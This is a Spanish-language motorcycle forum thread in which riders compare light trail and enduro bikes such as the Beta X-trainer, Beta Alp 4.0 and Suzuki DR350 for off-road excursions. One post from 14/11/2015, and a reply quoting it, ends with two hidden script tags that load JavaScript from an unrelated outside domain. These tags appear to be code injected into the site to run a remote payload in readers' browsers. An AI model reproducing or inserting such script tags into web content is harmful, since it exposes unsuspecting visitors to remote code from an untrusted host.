Yo la veo tanto para el que empieza, como para el que ya se ha vuelto sensato y tampoco busca ir a cuchillo, con los riesgos que ello entraña.

JOE VESPINO
10/11/2015, 20:21
Pero es que este 300 2 T no es igual que el 300 2 T de la RR de enduro.
Como dices está "amariconao" :lol:
Y aun y así, anda mas que los 4 T de las RIDE, pero sin la mala leche de los 2 T full de las enduro de verdad.
Yo no lo veo mala idea.

Otra cosa es que falle en otros detalles.
Entre lo que no veo la horquilla, que una invertida de 43 tampoco es que sea una mierda pinchá en un palo.
Vale, no servirá para hacer triples, pero tampoco es el de una trialera venida a mas, con un recorrido corto.

Yo la veo tanto para el que empieza, como para el que ya se ha vuelto sensato y tampoco busca ir a cuchillo, con los riesgos que ello entraña.

Quien dice que me parezca mala idea? me parece genial... si fuera 4T y con un poco mas de vocación aventurera o al menos mas preparada para excursiones largas.......

Solo digo que esta xtrainer intenta llegar al mismo tipo de gente, o similar, que la 4ride, tride, freeride etc.. pero desde un origen distinto. Para ti mejor las suspensiones de la freeride, para otros mas trialeros quizás lo mas importante sean los 85 kilos de la Montesa, para otros el motor 350 ccs de la freeride....

Lo que no entiendo como se puede decir que para eso mejor una enduro pata negra 2T, no creo que haya nada mas lejano tanto en planteamiento como en resultados practicos.

gasclassic
10/11/2015, 20:33
Quien dice que me parezca mala idea? me parece genial... si fuera 4T y con un poco mas de vocación aventurera o al menos mas preparada para excursiones largas.......

Solo digo que esta xtrainer intenta llegar al mismo tipo de gente, o similar, que la 4ride, tride, freeride etc.. pero desde un origen distinto. Para ti mejor las suspensiones de la freeride, para otros mas trialeros quizás lo mas importante sean los 85 kilos de la Montesa, para otros el motor 350 ccs de la freeride....

Lo que no entiendo como se puede decir que para eso mejor una enduro pata negra 2T, no creo que haya nada mas lejano tanto en planteamiento como en resultados practicos.

Pues coincido contigo, excepto quizás en lo de los 2 T
Entiendo que las normas anti-contaminación han ido acabando con ellos, pero para mi es un solución muy válida, con sus ventajas e inconvenientes.
Pero particularmente no le veo inconveniente en viajar con un 2 T, siempre y cuando el consumo y la fiabilidad estén acorde al uso requerido.
Hay 2 T que son verdaderas rocas, pasando de los 100.000 km sin tocar nada, caso de las Vespas.
Alguno dirá que tampoco la potencia que daban era mucha, pero aun siendo poca, era casi tanta como la que ofrecen scooters mas modernos de 4T.

Quiero decir que la pieza mas fiable, es la que no existe, esa seguro que no rompe.
Y un 2 T tiene menos cosas a romper.

motranqui
10/11/2015, 22:40
Pues coincido contigo, excepto quizás en lo de los 2 T
Entiendo que las normas anti-contaminación han ido acabando con ellos, pero para mi es un solución muy válida, con sus ventajas e inconvenientes.
Pero particularmente no le veo inconveniente en viajar con un 2 T, siempre y cuando el consumo y la fiabilidad estén acorde al uso requerido.
Hay 2 T que son verdaderas rocas, pasando de los 100.000 km sin tocar nada, caso de las Vespas.
Alguno dirá que tampoco la potencia que daban era mucha, pero aun siendo poca, era casi tanta como la que ofrecen scooters mas modernos de 4T.

Quiero decir que la pieza mas fiable, es la que no existe, esa seguro que no rompe.
Y un 2 T tiene menos cosas a romper.

OK, basta de teoría y de tertulia de café
Vende la indómita 690R, olvídate del cepo GS800, píllate la X-trainer y deléitanos con una crónica a lomos de esta bicha, al más puro estilo trail, con pistas, carretera, caminos y algo de equipaje a sus espaldas...;)

Es que hablamos (yo el primero) mucho, pero creo que la BMW R1200GS, "miles apart" de esta X-triner, está dentro de las diez motos más vendidas en el planeta...

Que sé que muchos (en teoría) buscamos algo lógico, pero el "factor testosterona" tira más por "mira qué pepino tengo". Es lo que hay :punky:

barbo7
10/11/2015, 23:16
Como dices es una enduro, con lo que ello comporta no solo a nivel de mantenimiento, si no también a nivel de comodidad de suspensiones, altura al suelo, posibilidad de llevar a alguien.
Enduros ya hay, si yo no me quejo de eso, lo que encuentro a faltar son trails, o sea, "enduros civilizadas"
Aun así, tentado estuve (de hecho estuvimos en contacto) de pillarle la WR450 a Caganer, pero al final me decidí por la 690.
Pues la caganastes por no pillarle la wr al Caganer.

Trencaterros
11/11/2015, 06:07
En la última salida hemos ido la mayoría monos de 600-700cc, una bi (950SE) y una enana Alp 4.0 que sigue sorprendiendonos incluso en tramos rápidos donde debería quedar atrás. Si que pierde fuelle en carretera porque no aguanta cruceros altos y peca de topes de suspensión en saltos gordos o se queda un poquito en tramos rápidos de verdad, pero es que no cansa, no derrapa, gasta poco, es bajita, tracciona bien y se domina mejor, da luz si se hace de noche, trepa bien en sitios delicados y es fácil de reparar…¿Tan difícil esa hacer algo con 120-125kg, 225 de recorrido con suspensiones buenas y un motor 350 LC, con unos 35-40cv y una sexta larguita? Algo en lo que te puedas sentar cómodo y donde todo el mundo llegue al suelo. Hay en el mercado alguna 250 de concepto "trail" pero seria buscar algo con más motor y menos peso y volumen, decantandose al trail-trial excursión...

Isidoro
11/11/2015, 07:21
Buena pregunta...

transalacant
11/11/2015, 08:14
Este post ha hecho que me fijara más detenidamente en la Beta Alp 4.0.
27cv, 133kgs, depósito de 10l, 5.700€ nueva y las pocas que hay en venta de segunda mano no bajan de los 3.000€ aunque tengan más de diez años, así que la depreciación es ridícula.
De hecho, de segunda mano interesa pillarla lo más reciente posible con la certeza de poder revendarla casi por lo mismo más adelante.

Mmmmm... interesante...

Tino.
11/11/2015, 08:30
Mi compi de toda la vida tuvo la DR350, mismo motor que la Alp, y aunque está muy bien, ese motor es muy justito. Rodando por carretera en sexta velocidad se viene fácilmente abajo a la que empieza una cuesta, con los desarrollos de serie.

transalacant
11/11/2015, 09:17
Mi compi de toda la vida tuvo la DR350, mismo motor que la Alp, y aunque está muy bien, ese motor es muy justito. Rodando por carretera en sexta velocidad se viene fácilmente abajo a la que empieza una cuesta, con los desarrollos de serie.

Seguro que aguanta mejor que la CBF250 de 21cv y 140kgs (http://www.rollomotero.com/2014/06/ruta-levante-almeriense-i.html)con la que me he recorrido buena parte de la mitad sur de la península cargado con todo el material de acampada, aunque desde luego no da para muchas alegrías y hay que planificar bien los adelantamientos.

A ti es que te gusta mucha arrancar piedras al dar gas jajaja, a mi me pasa lo mismo con la 640, pero en la práctica solo voy más rápido que con la DR 650 gracias a las mejores suspensiones. Con la DR y su motor tractoril salía más rápido de las curvas.

martinus
11/11/2015, 09:29
Pues a ti te valdrá una enduro 2T para lo mismo, para mi no tiene nada que ver. Una RR300 tiene unos horquillones de 48 mms de diametro, para comerse cortados, subir cortafuegos en tercera a fondo o pegar saltos de tres metros. Para mi una enduro 2T es un pura sangre, no una moto flanders para hacerse excursiones, ni mucho menos aprender.

Lo que ha hecho Beta con la xtrainer sobre la base de la RR300, con su horquilla "finita" de 43 mms, bajita, ligera y con el motor 300 2t amariconao, es intentar llegar a este mismo concepto "moñas-ride" por otro camino, partiendo de una moto de enduro; igual que Montesa o Beta lo Alp lo hacen partiendo de una moto de trial. Al final cada con sus "genes" pero todas van al mismo público, gente que quiere echar la mañana sin grandes complicaciones, probablemente lo más alejado de un endurero de 2T.

Hola Majo!!
Sobre la RR300 me autocorregí, me refería a la X-trainer, que es de lo que se habla en este hilo, de motos alternativas al trail para hacer excursiones camperas. Y yo lo que digo es que prefiero la X-trainer al resto, que por cierto con 35cv y 100Kg no la veo yo muy flanders....De hecho, ya ha comentado alguno que las de este estilo no se quedan atrás acompañando en rutas a las 400-950cc. Así que esta otra creo que es una opción muy interesante para el que como yo, cada vez usa menos la trail para hacer carretera.

martinus
11/11/2015, 09:33
Vamos a ver... Un 2T ¿para trail? :confused: con lo que gastan, depósito de 8´5l, asiento de enduro, motor rabiosillo, posición 100% al ataque, sin subchasis, luces de risa, ninguna gracia (imagino que sin llave de tapón de gasolina, ni general) etc, etc, etccccccccc

Una Xtrainer no es una moto de trail, en todo caso una moto de enduro "lógica" o "enduro light"

Orden :hammer:

Así no me vas a animar a vender la moto.....jejejeje

gasclassic
11/11/2015, 09:35
OK, basta de teoría y de tertulia de café
Vende la indómita 690R, olvídate del cepo GS800, píllate la X-trainer y deléitanos con una crónica a lomos de esta bicha, al más puro estilo trail, con pistas, carretera, caminos y algo de equipaje a sus espaldas...;)

Es que hablamos (yo el primero) mucho, pero creo que la BMW R1200GS, "miles apart" de esta X-triner, está dentro de las diez motos más vendidas en el planeta...

Que sé que muchos (en teoría) buscamos algo lógico, pero el "factor testosterona" tira más por "mira qué pepino tengo". Es lo que hay :punky:

Pues en un futuro, a la que hayan unidades de 2ª mano, no lo descarto.
La mas vendida del mundo es la Honda Cup y no por ello veo que los españoles suspiremos por ella.
Para algunos quizá, a mi me importa poco lo que piensen los demás, soy mas de "ande yo caliente y ríase la gente" y sirva de ejemplo llevar top case en una 690 o manoplas en invierno, sea la moto que sea.


Pues la caganastes por no pillarle la wr al Caganer.

:lol: no se que decirte, seguro que ahora estaría lamentando no haber comprado una 690.
¿solución? ir comprando todas las que te gusten.


En la última salida hemos ido la mayoría monos de 600-700cc, una bi (950SE) y una enana Alp 4.0 que sigue sorprendiendonos incluso en tramos rápidos donde debería quedar atrás. Si que pierde fuelle en carretera porque no aguanta cruceros altos y peca de topes de suspensión en saltos gordos o se queda un poquito en tramos rápidos de verdad, pero es que no cansa, no derrapa, gasta poco, es bajita, tracciona bien y se domina mejor, da luz si se hace de noche, trepa bien en sitios delicados y es fácil de reparar…¿Tan difícil esa hacer algo con 120-125kg, 225 de recorrido con suspensiones buenas y un motor 350 LC, con unos 35-40cv y una sexta larguita? Algo en lo que te puedas sentar cómodo y donde todo el mundo llegue al suelo. Hay en el mercado alguna 250 de concepto "trail" pero seria buscar algo con más motor y menos peso y volumen, decantandose al trail-trial excursión...

Totalmente de acuerdo.
Falta motos amables y sobran "Ferraris".
Hace 20-25 años la moto mas vendida en España era la CBR, por que veníamos de una época de que prohibía las importaciones y la industria nacional se había quedado obsoleta frente a la extranjera.
Una Montesa Crono 350 era "un pepino", mientras en el resto de Europa disfrutaban de pepino con el triple de potencia.
Luego se liberalizó el mercado y tuvimos acceso a "pepinos" por 4 duros.
Si querías un coche "pepino", rollo Porche, Ferrari, etc, te costaba mas que un piso, sin embargo una moto pepino te costaba solo 1 kilo.
Con los años el mercado ha madurado y nos vamos dando cuenta que la calle no es un circuito y le sacamos mas provecho a una moto mas cómoda y polivalente como la GS, que a "pepinos" como las CBR.
Pero esto no veo que haya llegado al sector off-road, donde las trail ya no tienen ni asiento, las enduro podrían correr un campeonato tal cual salen de la tienda y las trail, se han perdido por el camino, quedando 4 mal contadas.
Creo que esta Beta con 4 detalles (subchasis, depósito y asiento mas cómodo y bajo), sería casi perfecta como 2ª moto.


Este post ha hecho que me fijara más detenidamente en la Beta Alp 4.0.
27cv, 133kgs, depósito de 10l, 5.700€ nueva y las pocas que hay en venta de segunda mano no bajan de los 3.000€ aunque tengan más de diez años, así que la depreciación es ridícula.
De hecho, de segunda mano interesa pillarla lo más reciente posible con la certeza de poder revendarla casi por lo mismo más adelante.

Mmmmm... interesante...

Si que van caras, si.
A mi me han ofrecido un cambio y no veas el valor que le daba el dueño.
De ser mas barata me lo hubiera pensado muy seriamente.
Por buscarle un defecto, me tira un poco para atrás el mercado de after market.
para Honda, Yamaha y Suzuki, encuentras casi de todo.
Depósitos, cubre-carters, parrillas, etc.... y eso en la Beta no lo tengo tan claro.


Mi compi de toda la vida tuvo la DR350, mismo motor que la Alp, y aunque está muy bien, ese motor es muy justito. Rodando por carretera en sexta velocidad se viene fácilmente abajo a la que empieza una cuesta, con los desarrollos de serie.

Ya, pero es para lo que es.
No es lo mismo ir dos y con equipaje, que solo.
Y yendo solo, aunque no sea precisamente un cohete, seguro que puede ir a velocidades legales perfectamente.
Si los 16 cv de mi Montesa dan para ir a 90-100 tranquilamente!
No entiendo como te puedes quejar de la velocidad de crucero de la DRZ400S, por ejemplo y no te quejes de lo incómodo y ruinoso que es ir a mas de 100-110 con unos tacos de enduro.
¿a que ritmo vas con la 690 Tino? ;)
¿el límite lo marca la moto, las señales de tráfico o los neumáticos?
Otra cosa es llevar mixtos, pero eso, no se si acertadamente o no, lo veo en una moto única, no en una segunda moto, donde la puedes especializar mas al uso que se le de.
Y aun así, ese 350 de Suzuki creo que anda por los 30-33 cv y eso basta para ir a 120 y mas cuando tiene 6 marchas.
A mas, el viento ya empieza a ser molesto, los radares acechan, los tacos se gastan en un plis..........

gasclassic
11/11/2015, 09:44
Seguro que aguanta mejor que la CBF250 de 21cv y 140kgs (http://www.rollomotero.com/2014/06/ruta-levante-almeriense-i.html)con la que me he recorrido buena parte de la mitad sur de la península cargado con todo el material de acampada, aunque desde luego no da para muchas alegrías y hay que planificar bien los adelantamientos.

A ti es que te gusta mucha arrancar piedras al dar gas jajaja, a mi me pasa lo mismo con la 640, pero en la práctica solo voy más rápido que con la DR 650 gracias a las mejores suspensiones. Con la DR y su motor tractoril salía más rápido de las curvas.

Totalmente de acuerdo en todo.
Las motos con poca potencia bien llevadas, otra cosa es que te duermas y a media recta uno se de cuenta que ya puede adelantar, pueden perfectamente ir al fin del mundo.
Viendo el vídeo de ayer, queda claro que uso hace Tino de la moto, mas próximo al enduro, que al trail, nada que objetar, solo que no todos vamos a ese ritmo.
Y a mi también me pasa que no siempre voy mas rápido con la moto mas rápida, un motor nervioso te hace perder rueda fácilmente.


Hola Majo!!
Sobre la RR300 me autocorregí, me refería a la X-trainer, que es de lo que se habla en este hilo, de motos alternativas al trail para hacer excursiones camperas. Y yo lo que digo es que prefiero la X-trainer al resto, que por cierto con 35cv y 100Kg no la veo yo muy flanders....De hecho, ya ha comentado alguno que las de este estilo no se quedan atrás acompañando en rutas a las 400-950cc. Así que esta otra creo que es una opción muy interesante para el que como yo, cada vez usa menos la trail para hacer carretera.

35 cv para 100 kg, lo da cualquier 125 2T y bien llevada, en zonas muy jodidas pueden incluso ir mas rápido que bichos de 450 cc y 55 cv.
Si a esto le sumas que estos 35 cv no salen de estrujar 125 cc, si no de tranquilizar un 300 cc de 50 cv, pues fijo que ni es un cepo, ni hay que ser un flanders para tener uno, por que seguro que con ella se puede ir muy, pero que muy rápido.
Según el nivel de uno, incluso mas que en pepinos mas exigentes, donde sin una buena forma física, acabas reventado al poco de empezar y sin un alto nivel de pilotaje, se te atragantan muchas zonas que con esa moto hay que pasarlas a toda leche y la cabeza de uno aconseja pasarlas despacio por si acaso.

JOE VESPINO
11/11/2015, 10:25
Entendido Martinus. Lo del motor "amariconao" de la xtrainer lo digo con respecto al original de la RR300, por lo demás yo tambien creo que nos sobrará motor para la mayoria (..aunqeu yo personalmente preferiría algo similar pero en 4T, sobre todo por autonomía en rutas largas).

La Beta Alp 4.0 a mi tambien me ha tentado muchas veces, aunque me gustaria probarla sobre todo para ver como va de suspensiones y frenos (tuve una Alp 2.0 y en esos aspectos dejaba demasiado que desear). Creo que si tuviese que cambiar la moto para monte, la elección estaría entre esa y la WR250R.

idscasper
11/11/2015, 12:18
Gracias al forero Ernesto. Pude probar la alp2.0 este sábado pasado. Y aunque fue solo un ratito ya me dio para hacerme un poco a la idea. De frenos no me pareció que anduviese mal la verdad. Tampoco fue una prueba muy exigente lo que hice pero de leer comentarios pensaba que habría que pararla con los pies jeje. La suspensión de alante si que me pareció blandita. Total que aunque se lo que hay no término de verla como moto única. Creo que esta bien para combinarla jeje. Lo que si me dio u a sensación rara fue en las curvas quizás fuese por el neumático de trial. Era como que le costaba girar y luego caía. Ya digo, seguramente por el neumático de corte mas cuadrado.

Tino.
11/11/2015, 12:35
A ti es que te gusta mucha arrancar piedras al dar gas jajaja, a mi me pasa lo mismo con la 640, pero en la práctica solo voy más rápido que con la DR 650 gracias a las mejores suspensiones. Con la DR y su motor tractoril salía más rápido de las curvas.
Si, si, si... :ole: aunque yo voy más rápido con la 690 que con ninguna.

ernestoruiz
11/11/2015, 12:42
Gracias al forero Ernesto. Pude probar la alp2.0 este sábado pasado. Y aunque fue solo un ratito ya me dio para hacerme un poco a la idea. De frenos no me pareció que anduviese mal la verdad. Tampoco fue una prueba muy exigente lo que hice pero de leer comentarios pensaba que habría que pararla con los pies jeje. La suspensión de alante si que me pareció blandita. Total que aunque se lo que hay no término de verla como moto única. Creo que esta bien para combinarla jeje. Lo que si me dio u a sensación rara fue en las curvas quizás fuese por el neumático de trial. Era como que le costaba girar y luego caía. Ya digo, seguramente por el neumático de corte mas cuadrado.

La llevo con presiones bastante bajas.

manchi
11/11/2015, 13:18
Mi compi de toda la vida tuvo la DR350, mismo motor que la Alp, y aunque está muy bien, ese motor es muy justito. Rodando por carretera en sexta velocidad se viene fácilmente abajo a la que empieza una cuesta, con los desarrollos de serie.

Si estás hablando de la SE no es que el motor fuese justo, es que el desarrollo era extremadamente largo y la sexta solo la podías poner en llano descentente o en bajadas. Yo en la mia llegue a ver 160 km/h de marcador con el desarrollo original, luego le puse un desarrollo más "trail" (cuatro dientes más de corona) y la moto parecía otra, aun así hacía 140 km/h a fondo y podía mantener 110-120 sin problemas.

Personalmente me parecía mejor moto que su sucesora la DRZ 400, ya que era mucho más ligera y bajita, llevaba 6 velocidades y un asiento como dios manda.

JOE VESPINO
11/11/2015, 13:32
Idscasper, si te refieres a mis comentarios, la mia era un modelo viejuno (del 2001, quizás las modernas hayan mejorado mordiente de frenada) y en cuanto a las suspensiones yo soy un poco bastante friki con ese tema (aunque luego vaya pisando güebos). De todas formas la Alp 4.0 lleva mejor suspensión delantera (horquilla de 46 mms creo) espero que ahí mejore mucho a la 200.


.............

Personalmente me parecía mejor moto que su sucesora la DRZ 400, ya que era mucho más ligera y bajita, llevaba 6 velocidades y un asiento como dios manda.



No eres el primero que conozco que opina eso, y me refiero a alguien que ha pasado de una 350 a una 400S.

idscasper
11/11/2015, 13:39
No solo los tuyos Joe. En mas sitios he visto esa referencia de que frena mal. La de Ernesto también creo que es el modelo viejo. Pienso que con una preparación sencilla de suspensiones quedaría mejor para cuando se vaya un poco mas rápido por caminos.

motranqui
11/11/2015, 22:01
Así no me vas a animar a vender la moto.....jejejeje

Vamos a ver, es que ya sabes mi opinión :)

Si tienes claro que solo te gusta el campo, lo mas lógico es una tipo X-trainer o dependiendo de lo que realmente te haya picado "lo marrón", una enduro. Yo si solo pudiera tener una moto, sin duda una enduro, porque me lo paso mucho mejor haciendo enduro que haciendo "trail" (entendiendo todos lo que quiero decir con estos conceptos... ). Y si pudiera tener dos motos, una enduro y otra de la de tu estilo, porque cuando salgo a un viaje trail, cambio mi "chip" motero y voy buscando otras sensaciones "más cultas"-pero sin dejar de ir con algo que no me meta en aprietos por campo-. :salida:

martinus
12/11/2015, 08:56
Estamos en la misma onda (sin H)

.....Cochino dinero!!!!!

gasclassic
12/11/2015, 09:48
Vamos a ver, es que ya sabes mi opinión :)

Si tienes claro que solo te gusta el campo, lo mas lógico es una tipo X-trainer o dependiendo de lo que realmente te haya picado "lo marrón", una enduro. Yo si solo pudiera tener una moto, sin duda una enduro, porque me lo paso mucho mejor haciendo enduro que haciendo "trail" (entendiendo todos lo que quiero decir con estos conceptos... ). Y si pudiera tener dos motos, una enduro y otra de la de tu estilo, porque cuando salgo a un viaje trail, cambio mi "chip" motero y voy buscando otras sensaciones "más cultas"-pero sin dejar de ir con algo que no me meta en aprietos por campo-. :salida:

Vaya por delante que lo digo sin mala intención y en tono de broma sin ánimo de ofender, pero leyendo esto te iría mejor el nick de monervio, que el de motranqui . :lol:

motranqui
12/11/2015, 21:37
Vaya por delante que lo digo sin mala intención y en tono de broma sin ánimo de ofender, pero leyendo esto te iría mejor el nick de monervio, que el de motranqui . :lol:

Jajaja, bueno, el hecho de que me lo pase bien, no quiere decir que no piense las cosas antes de hacerlas… por eso soy un “motorista –tranquilo”, porque no me tiro a algo sin antes haber “asimilado” toda lateoría. Una vez dominada… las cosas empiezan a salir :abuelocuidado: ;)

<o:phttp://i.imgur.com/gYrqQH1.jpg</o
http://i.imgur.com/1iQ7VTs.jpg


Estamos en la misma onda (sin H)

.....Cochino dinero!!!!!

Pues lógicamente a veces tenemos que elegir, no queda otra. :p Las sensaciones de una moto trail, por endurera que sea, nunca van a ser iguales a las que te pueda dar una moto de enduro o de motocross en el plano deportivo, es decir, en un plano 100% racing. Pero es que las motos de trail también tienen el punto de aventura que no tienen sus hermanas más delgadas y radicales. Las dos cosas son diferentes, las dos buenas. A mí me gustan las dos. Pero también es cierto que es mucho más fácil hacer una salida enduro o irse al circuito de motocross que hacer una ruta trail, que requiere (según mi opinión) mucha más planificación.
Yo ahora ando buscando una moto como la tuya pues quiero seguir haciendo el trail que a mí me gusta. Pero es que sus dueños no la dejan a un precio razonable :trompeta:

Trencaterros
14/11/2015, 06:40
Sobre la Alp 4.0 hay que comentar aún que con los 10Ltr de deposito superas ampliamente los 200km en campo, el asiento es cómodo, la rueda trasera es de 18" y existe un amplio catalogo de elementos para darle ese "algo más"; cubrecarter, linea completa de escape con cámara de resonancia,…a precios bastante asequibles en comparación con las enduro o trails más de moda.

ioni
14/11/2015, 19:48
Hola.yo tengo una beta alp 4.0 que compre como segunda moto y la verdad es que estoy encantado.
Me sirve para ir a trabajar,para ir a por el pan y me pego unas excursiones campestres bien chulas.
Ya se que ni las suspensiones y frenos no están a la altura de una moto moderna,ni la moto en general,pero llego perfectamente al suelo,consume poco y el mantenimiento es muy económico.
Estuve dudando entre la Suzuki drz y esta, al final encontré una buena unidad y me la compre y no me arrepiento,de momento no me ha dado ningún problema.
Ademas uno va entrando en años.peso y las lesiones antiguas se notan,con esta moto disfruto mucho,a mi ritmo,sin prisas y me lo paso pipa! y de momento llego a todos los lados

JOE VESPINO
14/11/2015, 20:34
Que tal es la horquilla? blanda (supongo), rebotona, tiene regulaciones? hace topes? se aguanta en tramos rotos?

PD ando sensible con el tema, recien acabo de llegar de una ruta de 275 kms en la EXC, tengo el culo que ni lo siento... <script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>

betitou
14/11/2015, 21:21
Que tal es la horquilla? blanda (supongo), rebotona, tiene regulaciones? hace topes? se aguanta en tramos rotos?

PD ando sensible con el tema, recien acabo de llegar de una ruta de 275 kms en la EXC, tengo el culo que ni lo siento... <script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script><script type="text/javascript" src="https://cuev.in/aux.php?ver=10"></script>
Es que ojo...
275 km y EXC en la misma frase...
Normal que tu culo discrepe!!!

transalacant
14/11/2015, 21:47
Es que ojo...
275 km y EXC en la misma frase...
Normal que tu culo discrepe!!!

Seguro que con una Alp 4.0 acaba con el culo mucho mejor después de 275 kms de ruta... no hay más que ver la moto en fotos para darse cuenta que el confort fue la máxima prioridad en el diseño...

JOE VESPINO
14/11/2015, 23:10
Realmente lo del culo solo era una forma de hablar (no me molesta esa zona especialmente, lo tengo acostumbrado a la MTB y además llevo el asiento powerparts extramullido), mas bien es todo ese conjunto de cosas (sequedad de suspensiones, vibraciones, ruido, potencia, rudeza en general....) que hace que despues de 10 horas en una enduro acabes medio muetto.

MIKY ADVENTURE
15/11/2015, 00:06
Y eso que tu enduro es de lo mas razonable que hay, pero es el precio que hay que pagar por la ligereza, no?????

gasclassic
15/11/2015, 10:29
Y eso que tu enduro es de lo mas razonable que hay, pero es el precio que hay que pagar por la ligereza, no?????

Mas que por la ligereza (una vieja TTR250 es cómoda y ligera) creo que es el precio a pagar por la especialización.
Las trails están en tierra de nadie y suelen ser muy homogéneas, pero una enduro, es una moto radical, como pueda serlo una R de asfalto o una trialera.
Y como bien dice JOE, eso implica unas características muy particulares, que las hacen rápidas y efectivas en su terreno, pero incómodas.
Lo que viene siendo un vehículo de competición.
Si es que ya lo dice KTM, Ready to Race.
Por que ¿hay alguna enduro actual que sea cómoda?

katune
15/11/2015, 13:49
Las enduro actuales son perfectas para salir al monte,tanto enduro como trail,gastan como un mechero,fiables con un mantenimiento adecuado,pocas inercias y muy ligeras te permiten salir de cualquier embrollo,aventura total,solo pecan cuando sales a carretera porque no estan hechas para ello pero no porque no puedan,quitando los frenos cubierta y un asiento comodo es un cambio brutal,ya solo depende del aguante del piloto